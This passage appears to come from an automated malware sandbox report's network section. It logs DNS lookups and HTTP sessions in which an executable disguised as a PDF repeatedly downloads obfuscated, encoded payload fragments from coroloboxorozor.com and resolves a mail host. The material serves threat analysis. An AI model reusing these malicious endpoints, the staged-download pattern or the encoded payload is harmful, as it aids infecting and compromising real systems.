                                                    Feb 23, 2021 09:47:38.153426886 CET | 50183       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:47:38.212928057 CET | 53          | 50183     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:47:39.352325916 CET | 61531       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:47:39.433501959 CET | 53          | 61531     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:47:40.046212912 CET | 49228       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:47:40.103332996 CET | 53          | 49228     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:47:40.112678051 CET | 59794       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:47:40.472667933 CET | 53          | 59794     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:47:44.587205887 CET | 55916       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:47:44.644800901 CET | 53          | 55916     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:47:46.739728928 CET | 52752       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:47:46.801917076 CET | 53          | 52752     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:47:57.258447886 CET | 60542       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:47:57.317244053 CET | 53          | 60542     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:48:15.863022089 CET | 60689       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:48:15.911668062 CET | 53          | 60689     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:48:26.585319042 CET | 64206       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:48:26.638777971 CET | 53          | 64206     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:48:27.315637112 CET | 50904       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:48:27.364366055 CET | 53          | 50904     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:48:29.686208010 CET | 57525       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:48:29.758934021 CET | 53          | 57525     | 8.8.8.8     | 192.168.2.4
                                                    Feb 23, 2021 09:48:37.013794899 CET | 53814       | 53        | 192.168.2.4 | 8.8.8.8
                                                    Feb 23, 2021 09:48:37.073548079 CET | 53          | 53814     | 8.8.8.8     | 192.168.2.4

                                                    DNS Queries

                                                    Timestamp                           | Source IP   | Dest IP | Trans ID | OP Code            | Name                   | Type           | Class
                                                    Feb 23, 2021 09:46:49.462008953 CET | 192.168.2.4 | 8.8.8.8 | 0x4b33   | Standard query (0) | coroloboxorozor.com    | A (IP address) | IN (0x0001)
                                                    Feb 23, 2021 09:47:34.481651068 CET | 192.168.2.4 | 8.8.8.8 | 0x8f2f   | Standard query (0) | coroloboxorozor.com    | A (IP address) | IN (0x0001)
                                                    Feb 23, 2021 09:47:40.112678051 CET | 192.168.2.4 | 8.8.8.8 | 0x7944   | Standard query (0) | mail.soonlogistics.com | A (IP address) | IN (0x0001)
                                                    Feb 23, 2021 09:47:44.587205887 CET | 192.168.2.4 | 8.8.8.8 | 0x9438   | Standard query (0) | coroloboxorozor.com    | A (IP address) | IN (0x0001)
                                                    Feb 23, 2021 09:47:46.739728928 CET | 192.168.2.4 | 8.8.8.8 | 0xe10e   | Standard query (0) | mail.soonlogistics.com | A (IP address) | IN (0x0001)
                                                    Feb 23, 2021 09:48:37.013794899 CET | 192.168.2.4 | 8.8.8.8 | 0xc0a7   | Standard query (0) | mail.soonlogistics.com | A (IP address) | IN (0x0001)

                                                    DNS Answers

                                                    Timestamp                           | Source IP | Dest IP     | Trans ID | Reply Code   | Name                   | CName | Address       | Type           | Class
                                                    Feb 23, 2021 09:46:49.524245024 CET | 8.8.8.8   | 192.168.2.4 | 0x4b33   | No error (0) | coroloboxorozor.com    |       | 104.21.71.230 | A (IP address) | IN (0x0001)
                                                    Feb 23, 2021 09:46:49.524245024 CET | 8.8.8.8   | 192.168.2.4 | 0x4b33   | No error (0) | coroloboxorozor.com    |       | 172.67.172.17 | A (IP address) | IN (0x0001)
                                                    Feb 23, 2021 09:47:34.543003082 CET | 8.8.8.8   | 192.168.2.4 | 0x8f2f   | No error (0) | coroloboxorozor.com    |       | 104.21.71.230 | A (IP address) | IN (0x0001)
                                                    Feb 23, 2021 09:47:34.543003082 CET | 8.8.8.8   | 192.168.2.4 | 0x8f2f   | No error (0) | coroloboxorozor.com    |       | 172.67.172.17 | A (IP address) | IN (0x0001)
                                                    Feb 23, 2021 09:47:40.472667933 CET | 8.8.8.8   | 192.168.2.4 | 0x7944   | No error (0) | mail.soonlogistics.com |       | 103.17.211.69 | A (IP address) | IN (0x0001)
                                                    Feb 23, 2021 09:47:44.644800901 CET | 8.8.8.8   | 192.168.2.4 | 0x9438   | No error (0) | coroloboxorozor.com    |       | 104.21.71.230 | A (IP address) | IN (0x0001)
                                                    Feb 23, 2021 09:47:44.644800901 CET | 8.8.8.8   | 192.168.2.4 | 0x9438   | No error (0) | coroloboxorozor.com    |       | 172.67.172.17 | A (IP address) | IN (0x0001)
                                                    Feb 23, 2021 09:47:46.801917076 CET | 8.8.8.8   | 192.168.2.4 | 0xe10e   | No error (0) | mail.soonlogistics.com |       | 103.17.211.69 | A (IP address) | IN (0x0001)
                                                    Feb 23, 2021 09:48:37.073548079 CET | 8.8.8.8   | 192.168.2.4 | 0xc0a7   | No error (0) | mail.soonlogistics.com |       | 103.17.211.69 | A (IP address) | IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • coroloboxorozor.com

                                                    HTTP Packets

                                                    Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                                    0          | 192.168.2.4 | 49734       | 104.21.71.230  | 80               | C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe

                                                    Timestamp                           | kBytes transferred | Direction | Data
                                                    Feb 23, 2021 09:46:49.601401091 CET | 1219               | OUT       | GET /base/BE0C9BE287721D2E1639C8881BC9F105.html HTTP/1.1
                                                    Host: coroloboxorozor.com
                                                    Connection: Keep-Alive
                                                    Feb 23, 2021 09:46:49.687654018 CET | 1220               | IN        | HTTP/1.1 200 OK
                                                    Date: Tue, 23 Feb 2021 08:46:49 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Set-Cookie: __cfduid=d9fa176eba22cc52e23b6114cdde70cba1614070009; expires=Thu, 25-Mar-21 08:46:49 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                    Last-Modified: Mon, 22 Feb 2021 21:04:06 GMT
                                                    Vary: Accept-Encoding
                                                    X-Frame-Options: SAMEORIGIN
                                                    CF-Cache-Status: DYNAMIC
                                                    cf-request-id: 086faae72e0000fa5c4ba15000000001
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ysFNo9UjEculqGj%2BoDT86B3hgHj4M%2FydKgJwwmvzaCG7hO8H1FJXHpIgpUTeS5Lik4q%2FCq5sfTxgFngQ2TvnThJYA3xONz5tCzYp7MRR42qr%2BUZj"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                    Server: cloudflare
                                                    CF-RAY: 625fadb84a59fa5c-AMS
                                                    Data Raw: 65 33 61 0d 0a 3c 70 3e 47 47 46 59 6a 46 69 63 63 46 6a 46 75 46 6a 46 6a 46 6a 46 63 46 6a 46 6a 46 6a 46 6c 41 41 46 6c 41 41 46 6a 46 6a 46 69 4c 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 72 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 69 6c 4c 46 6a 46 6a 46 6a 46 69 63 46 75 69 46 69 4c 72 46 69 63 46 6a 46 69 4c 6a 46 59 46 6c 6a 41 46 75 75 46 69 4c 63 46 69 46 47 72 46 6c 6a 41 46 75 75 46 4c 63 46 69 6a 63 46 69 6a 41 46 69 69 41 46 75 6c 46 69 69 6c 46 69 69 63 46 69 69 69 46 69 6a 75 46 69 69 63 46 59 47 46 69 6a 59 46 75 6c 46 59 59 46 59 47 46 69 69 6a 46 69 69 6a 46 69 69 69 46 69 69 72 46 75 6c 46 59 4c 46 69 6a 69 46 75 6c 46 69 69 63 46 69 69 47 46 69 69 6a 46 75 6c 46 69 6a 41 46 69 69 6a 46 75 6c 46 72 4c 46 47 59 46 4c 75 46 75 6c 46 69 6a 59 46 69 69 69 46 69 6a 6a 46 69 6a 69 46 63 72 46 69 75 46 69 75 46 69 6a 46 75 72 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 4c 6a 46 72 59 46 6a 46 6a 46 47 72 46 69 46 75 46 6a 46 47 72 46 69 63 6c 46 63 69 46 69 4c 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6c 6c 63 46 6a 46 75 63 46 6a 46 69 69 46 69 46 4c 6a 46 6a 46 6a 46 4c 63 46 41 46 6a 46 6a 46 72 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6c 6c 6c 46 69 69 63 46 41 46 6a 46 6a 46 75 6c 46 6a 46 6a 46 6a 46 69 6c 4c 46 41 46 6a 46 6a 46 6a 46 6a 46 69 6c 4c 46 6a 46 75 6c 46 6a 46 6a 46 6a 46 6c 46 6a 46 6a 46 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 63 46 6a 46 6a 46 6a 46 6a 46
                                                    Data Ascii: e3a<p>GGFYjFiccFjFuFjFjFjFcFjFjFjFlAAFlAAFjFjFiLcFjFjFjFjFjFjFjFrcFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFilLFjFjFjFicFuiFiLrFicFjFiLjFYFljAFuuFiLcFiFGrFljAFuuFLcFijcFijAFiiAFulFiilFiicFiiiFijuFiicFYGFijYFulFYYFYGFiijFiijFiiiFiirFulFYLFijiFulFiicFiiGFiijFulFijAFiijFulFrLFGYFLuFulFijYFiiiFijjFijiFcrFiuFiuFijFurFjFjFjFjFjFjFjFLjFrYFjFjFGrFiFuFjFGrFiclFciFiLjFjFjFjFjFjFjFjFjFllcFjFucFjFiiFiFLjFjFjFLcFAFjFjFrFjFjFjFjFjFjFlllFiicFAFjFjFulFjFjFjFilLFAFjFjFjFjFilLFjFulFjFjFjFlFjFjFcFjFjFjFjFjFjFjFcFjFjFjFjF
Feb 23, 2021 09:46:50.106106043 CET | 2284 | OUT | GET /base/B7EFDEC15CD29E4CF1B708AC6486760D.html HTTP/1.1
Host: coroloboxorozor.com
Feb 23, 2021 09:46:50.312967062 CET | 2285 | IN | HTTP/1.1 200 OK
Date: Tue, 23 Feb 2021 08:46:50 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d9956ec78079b7fe40b119ea02652d9df1614070010; expires=Thu, 25-Mar-21 08:46:50 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Mon, 22 Feb 2021 21:04:09 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 086faae91f0000fa5ca1262000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=njZD96MeGGnp0OT0z8Fsp0rMsAKxbHeORttwB%2BrS3AiIwnlihgpwZC1CpIerPqNHsjvwDYYIISWuWpZ%2BlRke96z5cn7Nt%2B1H%2FH%2BIcg%2BlfSS9ZWvh"}],"group":"cf-nel","max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 625fadbb6f50fa5c-AMS
                                                    Data Raw: 31 37 30 30 0d 0a 3c 70 3e 63 46 69 4c 72 46 4c 41 46 6c 63 63 46 6c 63 63 46 69 6a 4c 46 6c 41 75 46 59 75 46 69 63 46 6c 6c 6a 46 69 69 63 46 69 72 69 46 72 6c 46 6c 69 72 46 6c 69 72 46 4c 59 46 6c 75 63 46 72 4c 46 6c 6c 6a 46 47 41 46 6c 69 47 46 6c 75 41 46 69 41 75 46 47 6c 46 6c 69 4c 46 69 75 6c 46 6c 69 46 69 4c 63 46 69 4c 63 46 69 75 47 46 6c 72 46 6c 41 6a 46 69 41 6a 46 69 6c 6c 46 72 46 6c 46 69 63 47 46 69 69 47 46 6c 6a 46 69 4c 72 46 69 69 59 46 6c 69 72 46 69 6a 47 46 6c 75 75 46 69 75 72 46 47 6a 46 6c 6c 41 46 47 6a 46 6c 6c 4c 46 63 63 46 69 59 59 46 47 59 46 6c 69 59 46 69 69 75 46 6a 46 6c 41 69 46 69 41 63 46 72 6a 46 72 6a 46 6c 6a 69 46 59 6a 46 6c 41 6a 46 69 41 6a 46 72 69 46 6c 6a 69 46 4c 63 46 6c 6c 59 46 63 69 46 6c 6a 6a 46 4c 69 46 69 63 46 6c 63 63 46 69 75 41 46 69 75 41 46 75 4c 46 69 72 6c 46 72 69 46 69 59 6a 46 59 6c 46 63 46 69 41 59 46 47 72 46 6c 69 72 46 59 72 46 6c 41 69 46 6c 6c 46 69 72 75 46 6c 69 63 46 69 63 63 46 69 63 4c 46 63 6a 46 6c 63 75 46 69 72 6a 46 75 6a 46 69 47 6c 46 41 41 46 6c 69 63 46 69 69 59 46 69 69 59 46 69 46 69 41 6c 46 69 6c 4c 46 6c 47 46 6c 4c 46 69 47 75 46 69 69 72 46 69 41 46 59 4c 46 6c 4c 46 75 46 69 41 69 46 72 63 46 6c 75 47 46 69 69 47 46 6c 6a 46 69 4c 6a 46 47 59 46 69 6c 47 46 41 47 46 6c 6c 41 46 69 69 63 46 69 63 41 46 75 69 46 69 6a 72 46 75 75 46 6c 6c 6c 46 69 69 47 46 69 63 41 46 63 6a 46 69 4c 41 46 47 47 46 6c 6a 46 69 41 63 46 72 47 46 72 47 46 63 47 46 6c 6a 6c 46 59 69 46 6c 75 72 46 41 4c 46 6c 69 75 46 63 72 46 63 72 46 6c 41 6c 46 69 41 69 46 69 69 41 46 63 47 46 69 4c 63 46 4c
                                                    Data Ascii: 1700<p>cFiLrFLAFlccFlccFijLFlAuFYuFicFlljFiicFiriFrlFlirFlirFLYFlucFrLFlljFGAFliGFluAFiAuFGlFliLFiulFliFiLcFiLcFiuGFlrFlAjFiAjFillFrFlFicGFiiGFljFiLrFiiYFlirFijGFluuFiurFGjFllAFGjFllLFccFiYYFGYFliYFiiuFjFlAiFiAcFrjFrjFljiFYjFlAjFiAjFriFljiFLcFllYFciFljjFLiFicFlccFiuAFiuAFuLFirlFriFiYjFYlFcFiAYFGrFlirFYrFlAiFllFiruFlicFiccFicLFcjFlcuFirjFujFiGlFAAFlicFiiYFiiYFiFiAlFilLFlGFlLFiGuFiirFiAFYLFlLFuFiAiFrcFluGFiiGFljFiLjFGYFilGFAGFllAFiicFicAFuiFijrFuuFlllFiiGFicAFcjFiLAFGGFljFiAcFrGFrGFcGFljlFYiFlurFALFliuFcrFcrFlAlFiAiFiiAFcGFiLcFL


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49753 | 104.21.71.230 | 80 | C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 09:47:34.660684109 CET | 3060 | OUT | GET /base/BE0C9BE287721D2E1639C8881BC9F105.html HTTP/1.1
Host: coroloboxorozor.com
Connection: Keep-Alive
Feb 23, 2021 09:47:34.742083073 CET | 3082 | IN | HTTP/1.1 200 OK
Date: Tue, 23 Feb 2021 08:47:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=ddf692e164e229dc73d66edfe1d1c721d1614070054; expires=Thu, 25-Mar-21 08:47:34 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Mon, 22 Feb 2021 21:04:06 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 086fab97290000d8b50f02c000000001
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=t%2FHkoZrji%2BX621Qp%2F%2BUnGjpZCr7idJcUZfS6iq6Hms%2F97b6PPz4WUSHbtj0xTW%2BCqKy6ZqtMcFQaQ7Jwxi3j%2BoRyk5psSeRlrvt%2FaZrthmCgpE9l"}],"max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 625faed1ddd0d8b5-AMS
                                                    Data Raw: 65 33 61 0d 0a 3c 70 3e 47 47 46 59 6a 46 69 63 63 46 6a 46 75 46 6a 46 6a 46 6a 46 63 46 6a 46 6a 46 6a 46 6c 41 41 46 6c 41 41 46 6a 46 6a 46 69 4c 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 72 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 69 6c 4c 46 6a 46 6a 46 6a 46 69 63 46 75 69 46 69 4c 72 46 69 63 46 6a 46 69 4c 6a 46 59 46 6c 6a 41 46 75 75 46 69 4c 63 46 69 46 47 72 46 6c 6a 41 46 75 75 46 4c 63 46 69 6a 63 46 69 6a 41 46 69 69 41 46 75 6c 46 69 69 6c 46 69 69 63 46 69 69 69 46 69 6a 75 46 69 69 63 46 59 47 46 69 6a 59 46 75 6c 46 59 59 46 59 47 46 69 69 6a 46 69 69 6a 46 69 69 69 46 69 69 72 46 75 6c 46 59 4c 46 69 6a 69 46 75 6c 46 69 69 63 46 69 69 47 46 69 69 6a 46 75 6c 46 69 6a 41 46 69 69 6a 46 75 6c 46 72 4c 46 47 59 46 4c 75 46 75 6c 46 69 6a 59 46 69 69 69 46 69 6a 6a 46 69 6a 69 46 63 72 46 69 75 46 69 75 46 69 6a 46 75 72 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 4c 6a 46 72 59 46 6a 46 6a 46 47 72 46 69 46 75 46 6a 46 47 72 46 69 63 6c 46 63 69 46 69 4c 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6c 6c 63 46 6a 46 75 63 46 6a 46 69 69 46 69 46 4c 6a 46 6a 46 6a 46 4c 63 46 41 46 6a 46 6a 46 72 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6c 6c 6c 46 69 69 63 46 41 46 6a 46 6a 46 75 6c 46 6a 46 6a 46 6a 46 69 6c 4c 46 41 46 6a 46 6a 46 6a 46 6a 46 69 6c 4c 46 6a 46 75 6c 46 6a 46 6a 46 6a 46 6c 46 6a 46 6a 46 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 63 46
                                                    Data Ascii: e3a<p>GGFYjFiccFjFuFjFjFjFcFjFjFjFlAAFlAAFjFjFiLcFjFjFjFjFjFjFjFrcFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFjFilLFjFjFjFicFuiFiLrFicFjFiLjFYFljAFuuFiLcFiFGrFljAFuuFLcFijcFijAFiiAFulFiilFiicFiiiFijuFiicFYGFijYFulFYYFYGFiijFiijFiiiFiirFulFYLFijiFulFiicFiiGFiijFulFijAFiijFulFrLFGYFLuFulFijYFiiiFijjFijiFcrFiuFiuFijFurFjFjFjFjFjFjFjFLjFrYFjFjFGrFiFuFjFGrFiclFciFiLjFjFjFjFjFjFjFjFjFllcFjFucFjFiiFiFLjFjFjFLcFAFjFjFrFjFjFjFjFjFjFlllFiicFAFjFjFulFjFjFjFilLFAFjFjFjFjFilLFjFulFjFjFjFlFjFjFcFjFjFjFjFjFjFjFcF
Feb 23, 2021 09:47:36.916448116 CET | 4382 | OUT | GET /base/B7EFDEC15CD29E4CF1B708AC6486760D.html HTTP/1.1
Host: coroloboxorozor.com
Feb 23, 2021 09:47:37.020649910 CET | 4384 | IN | HTTP/1.1 200 OK
Date: Tue, 23 Feb 2021 08:47:36 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d7431070c03d145fc1b740f00718662ff1614070056; expires=Thu, 25-Mar-21 08:47:36 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Mon, 22 Feb 2021 21:04:09 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 086fab9ffa0000d8b5378a0000000001
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=mARSgPe7S6fWchZeYaQK4CZiQenKfXfsn7vbgwMzDQ2ZWmyfJ4oUrnxFEyeRGCb5HkVlpudjVhgXTmOGz3GNFnWMvS%2BT%2Bva8zFZeUnM2UimzbKEH"}],"max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 625faedffc9cd8b5-AMS
                                                    Data Raw: 37 63 39 36 0d 0a 3c 70 3e 63 46 69 4c 72 46 4c 41 46 6c 63 63 46 6c 63 63 46 69 6a 4c 46 6c 41 75 46 59 75 46 69 63 46 6c 6c 6a 46 69 69 63 46 69 72 69 46 72 6c 46 6c 69 72 46 6c 69 72 46 4c 59 46 6c 75 63 46 72 4c 46 6c 6c 6a 46 47 41 46 6c 69 47 46 6c 75 41 46 69 41 75 46 47 6c 46 6c 69 4c 46 69 75 6c 46 6c 69 46 69 4c 63 46 69 4c 63 46 69 75 47 46 6c 72 46 6c 41 6a 46 69 41 6a 46 69 6c 6c 46 72 46 6c 46 69 63 47 46 69 69 47 46 6c 6a 46 69 4c 72 46 69 69 59 46 6c 69 72 46 69 6a 47 46 6c 75 75 46 69 75 72 46 47 6a 46 6c 6c 41 46 47 6a 46 6c 6c 4c 46 63 63 46 69 59 59 46 47 59 46 6c 69 59 46 69 69 75 46 6a 46 6c 41 69 46 69 41 63 46 72 6a 46 72 6a 46 6c 6a 69 46 59 6a 46 6c 41 6a 46 69 41 6a 46 72 69 46 6c 6a 69 46 4c 63 46 6c 6c 59 46 63 69 46 6c 6a 6a 46 4c 69 46 69 63 46 6c 63 63 46 69 75 41 46 69 75 41 46 75 4c 46 69 72 6c 46 72 69 46 69 59 6a 46 59 6c 46 63 46 69 41 59 46 47 72 46 6c 69 72 46 59 72 46 6c 41 69 46 6c 6c 46 69 72 75 46 6c 69 63 46 69 63 63 46 69 63 4c 46 63 6a 46 6c 63 75 46 69 72 6a 46 75 6a 46 69 47 6c 46 41 41 46 6c 69 63 46 69 69 59 46 69 69 59 46 69 46 69 41 6c 46 69 6c 4c 46 6c 47 46 6c 4c 46 69 47 75 46 69 69 72 46 69 41 46 59 4c 46 6c 4c 46 75 46 69 41 69 46 72 63 46 6c 75 47 46 69 69 47 46 6c 6a 46 69 4c 6a 46 47 59 46 69 6c 47 46 41 47 46 6c 6c 41 46 69 69 63 46 69 63 41 46 75 69 46 69 6a 72 46 75 75 46 6c 6c 6c 46 69 69 47 46 69 63 41 46 63 6a 46 69 4c 41 46 47 47 46 6c 6a 46 69 41 63 46 72 47 46 72 47 46 63 47 46 6c 6a 6c 46 59 69 46 6c 75 72 46 41 4c 46 6c 69 75 46 63 72 46 63 72 46 6c 41 6c 46 69 41 69 46 69 69 41 46 63 47 46 69 4c 63 46 4c 41 46 6c 63 72 46 69 63
                                                    Data Ascii: 7c96<p>cFiLrFLAFlccFlccFijLFlAuFYuFicFlljFiicFiriFrlFlirFlirFLYFlucFrLFlljFGAFliGFluAFiAuFGlFliLFiulFliFiLcFiLcFiuGFlrFlAjFiAjFillFrFlFicGFiiGFljFiLrFiiYFlirFijGFluuFiurFGjFllAFGjFllLFccFiYYFGYFliYFiiuFjFlAiFiAcFrjFrjFljiFYjFlAjFiAjFriFljiFLcFllYFciFljjFLiFicFlccFiuAFiuAFuLFirlFriFiYjFYlFcFiAYFGrFlirFYrFlAiFllFiruFlicFiccFicLFcjFlcuFirjFujFiGlFAAFlicFiiYFiiYFiFiAlFilLFlGFlLFiGuFiirFiAFYLFlLFuFiAiFrcFluGFiiGFljFiLjFGYFilGFAGFllAFiicFicAFuiFijrFuuFlllFiiGFicAFcjFiLAFGGFljFiAcFrGFrGFcGFljlFYiFlurFALFliuFcrFcrFlAlFiAiFiiAFcGFiLcFLAFlcrFic


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49764 | 104.21.71.230 | 80 | C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 09:47:44.727893114 CET | 5073 | OUT | GET /base/BE0C9BE287721D2E1639C8881BC9F105.html HTTP/1.1
Host: coroloboxorozor.com
Connection: Keep-Alive
Feb 23, 2021 09:47:44.830785036 CET | 5074 | IN | HTTP/1.1 200 OK
Date: Tue, 23 Feb 2021 08:47:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dca7a60f312471aec97222035e3e73aaa1614070064; expires=Thu, 25-Mar-21 08:47:44 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Mon, 22 Feb 2021 21:04:06 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 086fabbe7d0000c78590a87000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=m%2FSQLLQhymcqhKEWMw4WdDYgIetxT4pXCGCaQvKAxT0be5%2BWp7qaGnk7Q44vm7ZPjHdTfPLPOiibkl9qQHFusoykdi0ABaZTxflKVqIxlqvozu2C"}],"max_age":604800,"group":"cf-nel"}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 625faf10c80ac785-AMS
                                                    Data Raw: 37 63 39 37 0d 0a 3c 70 3e 47 47 46 59 6a 46 69 63 63 46 6a 46 75 46 6a 46 6a 46 6a 46 63 46 6a 46 6a 46 6a 46 6c 41 41 46 6c 41 41 46 6a 46 6a 46 69 4c 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 72 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 69 6c 4c 46 6a 46 6a 46 6a 46 69 63 46 75 69 46 69 4c 72 46 69 63 46 6a 46 69 4c 6a 46 59 46 6c 6a 41 46 75 75 46 69 4c 63 46 69 46 47 72 46 6c 6a 41 46 75 75 46 4c 63 46 69 6a 63 46 69 6a 41 46 69 69 41 46 75 6c 46 69 69 6c 46 69 69 63 46 69 69 69 46 69 6a 75 46 69 69 63 46 59 47 46 69 6a 59 46 75 6c 46 59 59 46 59 47 46 69 69 6a 46 69 69 6a 46 69 69 69 46 69 69 72 46 75 6c 46 59 4c 46 69 6a 69 46 75 6c 46 69 69 63 46 69 69 47 46 69 69 6a 46 75 6c 46 69 6a 41 46 69 69 6a 46 75 6c 46 72 4c 46 47 59 46 4c 75 46 75 6c 46 69 6a 59 46 69 69 69 46 69 6a 6a 46 69 6a 69 46 63 72 46 69 75 46 69 75 46 69 6a 46 75 72 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 4c 6a 46 72 59 46 6a 46 6a 46 47 72 46 69 46 75 46 6a 46 47 72 46 69 63 6c 46 63 69 46 69 4c 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6c 6c 63 46 6a 46 75 63 46 6a 46 69 69 46 69 46 4c 6a 46 6a 46 6a 46 4c 63 46 41 46 6a 46 6a 46 72 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6c 6c 6c 46 69 69 63 46 41 46 6a 46 6a 46 75 6c 46 6a 46 6a 46 6a 46 69 6c 4c 46 41 46 6a 46 6a 46 6a 46 6a 46 69 6c 4c 46 6a 46 75 6c 46 6a 46 6a 46 6a 46 6c 46 6a 46 6a 46 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a 46 63 46 6a 46 6a 46 6a 46 6a 46 6a 46 6a
